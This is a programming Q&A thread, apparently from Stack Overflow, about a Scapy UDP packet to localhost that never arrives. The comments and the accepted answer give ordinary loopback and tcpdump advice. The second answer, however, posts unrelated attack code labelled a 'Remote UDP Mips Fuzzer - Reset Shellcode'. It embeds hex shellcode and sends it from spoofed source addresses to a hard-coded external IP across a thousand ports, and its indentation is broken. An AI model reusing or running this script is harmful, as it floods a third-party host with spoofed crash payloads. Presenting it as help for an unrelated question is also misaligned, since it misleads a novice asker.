# UDP packets not working for scapy?

Tags: python, scapy

I made a simple program that tries to send a UDP packet to my ncat server

here is the code:

```
from scapy.all import *

sr1(IP(dst="127.0.0.1")/UDP(dport=8080)/"TAG1")
```

but I get nothing from my ncat server, can someone please tell me what I am doing wrong?

Comment: try [`conf.L3socket=L3RawSocket`](http://trac.secdev.org/scapy/wiki/FAQ#Icantping127.0.0.1.Scapydoesnotworkwith127.0.0.1orontheloopbackinterface)

Comment: Follow the above advice (or use another destination address): sending to 127.0.0.1 with Scapy is... disturbing.

Comment: Same advice, [different link](http://www.secdev.org/projects/scapy/faq.html).

Answer (score 1, accepted):

when developing a network related project, i suggest you install capturing software like tcpdump or wireshark. It hepls you to see what is in the network.
To get all packets to 127.0.0.1 using tcpdump, you may use following command:

```
 tcpdump -i eth0 "dst 127.0.0.1 and dst port 8080"
```

Comment: This did help me, I still found that no packets were sent, here is my out put after scapy "sent" about 2400 packets `D4zk1tty@kali:~$ sudo tcpdump -i wlan0 "dst 127.0.0.1 and dst port 8080"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wlan0, link-type EN10MB (Ethernet), capture size 65535 bytes
^C
0 packets captured
0 packets received by filter
0 packets dropped by kernel
`

Comment: Sorry, i do not notice your ip is the 127.0.0.1. The i option tells tcpdump to listen on which device. you should use "tcpdump -i lo xxx" to capture packets in the lo since your dst ip is 127.0.0.1. When kernel output packets for 127.0.0.1, it would not go through the real device(eth0 or wlan0). Please check your scrapy do send packets to lo.

Answer (score 0):

Try this

```
from scapy.all import * 
print("Remote UDP Mips Fuzzer - Reset Shellcode")
for num in range(0,10):
data = "00" * int(str(num))
sc = "3c06432134c6fedc3c05281234a519693c04fee13484dead24020ff80101010c"
a = data+sc
for ip in range(0,255):
  for port in range(0,1000):
    i=IP()
    i.dst="213.48.152.128"              #Change this
    i.src="10.0"+"."+str(ip)+"."+str(ip)
    udp=UDP()
    udp.sport=int(str(port))
    udp.dport=int(str(port))
    sendp(i/udp/a)
```

See how it works ?